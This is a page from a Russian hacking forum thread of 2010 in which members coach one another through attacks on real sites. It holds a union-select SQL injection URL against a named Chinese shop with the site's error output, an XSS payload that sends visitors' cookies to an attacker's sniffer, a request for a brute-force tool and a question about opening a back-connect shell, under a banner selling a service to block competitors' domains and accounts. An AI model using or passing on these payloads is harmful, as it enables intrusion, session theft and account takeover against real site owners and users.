Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1335 из 2422

1335

Опции темы

Поиск в этой теме

Опции просмотра

05.06.2010, 15:28

.:[melkiy]:.

Постоянный

Регистрация: 25.01.2009

Сообщений: 368

С нами: 9100556

Репутация: 912

Цитата:

Сообщение от haito

Hi Team;

http://www.ibuycc.com.cn/product.php?id=77'

этого сайта SQL ошибка. Я пытался использовать "union select" до 50, но не результатом
Можем ли мы "inject" этот сайт?

Код:

http://www.ibuycc.com.cn/product.php?id=-77+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30

хватит спрашивать одно и тоже. читай статьи и всё будет ясно

Цитата:

Сообщение от haito

К сожалению, не видел, любое проявление версия
Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/ibuyccco/public_html/product.php on line 295

Warning: Cannot modify header information - headers already sent by (output started at /home/ibuyccco/public_html/product.php:27) in /home/ibuyccco/public_html/includes/lib.function.php on line 182

Warning: Cannot modify header information - headers already sent by (output started at /home/ibuyccco/public_html/product.php:27) in /home/ibuyccco/public_html/includes/lib.function.php on line 192
‹��xÚí}ëwG¶ïçËZùú(k]

так видно? О_о

Код:

http://www.ibuycc.com.cn/product.php?id=-77+union+select+1,2,3,4,version(),version(),7,version(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось .:[melkiy]:.; 05.06.2010 в 15:46..

05.06.2010, 15:40

haito

Новичок

Регистрация: 27.05.2010

Сообщений: 13

С нами: 8399502

Репутация: 0

Цитата:

Сообщение от .:[melkiy]:.

Код:

http://www.ibuycc.com.cn/product.php?id=-77+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30

Благодарю за ответ, но не отображать версии

Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/ibuyccco/public_html/product.php on line 295

Warning: Cannot modify header information - headers already sent by (output started at /home/ibuyccco/public_html/product.php:27) in /home/ibuyccco/public_html/includes/lib.function.php on line 182

Warning: Cannot modify header information - headers already sent by (output started at /home/ibuyccco/public_html/product.php:27) in /home/ibuyccco/public_html/includes/lib.function.php on line 192
‹��xÚí}ëwG¶ïçËZùú(k]

Последний раз редактировалось haito; 05.06.2010 в 15:53..

05.06.2010, 16:09

Ctacok

Moderator - Level 7

Регистрация: 19.12.2008

Сообщений: 1,203

С нами: 9154406

Репутация: 2221

Цитата:

Сообщение от haito

Убери пробелы...

05.06.2010, 15:21

youger

Познающий

Регистрация: 03.05.2010

Сообщений: 51

С нами: 8434116

Репутация: 1

Цитата:

Сообщение от wkar

я еще не слышал об обходе такого
ПС
БрутЬ, брутЬ и еще раз ЬрутЪ

есть готовый брут под этот случай?

05.06.2010, 16:20

wkar

Познающий

Регистрация: 18.10.2009

Сообщений: 80

С нами: 8718197

Репутация: 11

Цитата:

Сообщение от youger

есть готовый брут под этот случай?

Попробуй этот: https://forum.antichat.ru/thread109600.html

05.06.2010, 12:21

EoGeneo

Познающий

Регистрация: 29.08.2009

Сообщений: 75

С нами: 8789993

Репутация: 5

Подскажите пожалуйста.
На сайте при вводе вместо логина <script>alert()</script> выскакивает табличка. я так понял это xss. Покурили маны малеха ну так и не допёр. модифицирую запрос до
<sсriрt>img = new Image(); img.src = "путь до снифа?"+document.cookie;</sсriрt>

вставляю в то же поля и ничего не выскакивает. в чем прикол?

05.06.2010, 12:24

wildshaman

Постоянный

Регистрация: 16.04.2008

Сообщений: 889

С нами: 9510146

Репутация: 1550

Прикол в том, что ничего и не выскочит, но куки отправятся на сниффер.

05.06.2010, 13:22

EoGeneo

Познающий

Регистрация: 29.08.2009

Сообщений: 75

С нами: 8789993

Репутация: 5

Спасибо. буду разбираться. у меня сниф делюкс и мильти каника, что то не ловит куки.

05.06.2010, 13:39

wkar

Познающий

Регистрация: 18.10.2009

Сообщений: 80

С нами: 8718197

Репутация: 11

Что может мешать сделать бекконект ?Система freebsd 7.2.
Спасибо

#10

05.06.2010, 13:51

EoGeneo

Познающий

Регистрация: 29.08.2009

Сообщений: 75

С нами: 8789993

Репутация: 5

Может быть тот порт занят через который ты бэкконнект делаешь.

Страница 1335 из 2422

1335

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules